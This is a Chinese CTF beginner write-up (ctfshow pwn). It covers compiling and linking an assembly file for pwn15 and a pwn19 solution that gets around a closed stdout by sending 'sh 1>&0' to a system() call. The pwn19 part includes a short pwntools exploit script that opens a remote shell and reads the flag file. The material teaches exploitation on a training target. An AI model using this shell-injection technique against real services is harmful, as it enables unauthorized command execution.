ctfshow-pwn入门笔记
pwn15
该题目是很简单,总结一些需要的知识点:
- 使用
as手动编译asm文件 - 使用
ld手动链接可执行文件
文件下载后是一个名为flag.asm的文件
首先使用nasm命令编译为flag.o文件
nasm -f elf32 flag.asm -o flag.o
-f: 指定编译文件类型-o: 指定编译后导出的文件名
编译后会生成一个flag.o文件,接着使用ld命令链接
ld -m elf_i386 -s flag.o -o flag
-m: 指定连接文件类型-s: 最小输出-o: 指定链接后输入的文件名
最后得到可执行文件运行得到flag

pwn19
改题目的表述为关闭了输出流,一定是最安全的吗?
使用ida分析

该程序我们输入一次值,然后就会在三秒后关闭
使用fclose()关闭了输出流,但是我们可以将输入的命令重定向到标准输入,例如1>&0,后面会通过read()读取我们输入的内容保存到buf变量,使用system执行命令,
在本地执行命令测试

接着exp如下
from pwn import *
io = remote("pwn.challenge.ctf.show",28219)
io.recv()
io.sendline("sh 1>&0")
io.interactive()
运行得到shell,cat /ctfshow_flag的到flag


浙公网安备 33010602011771号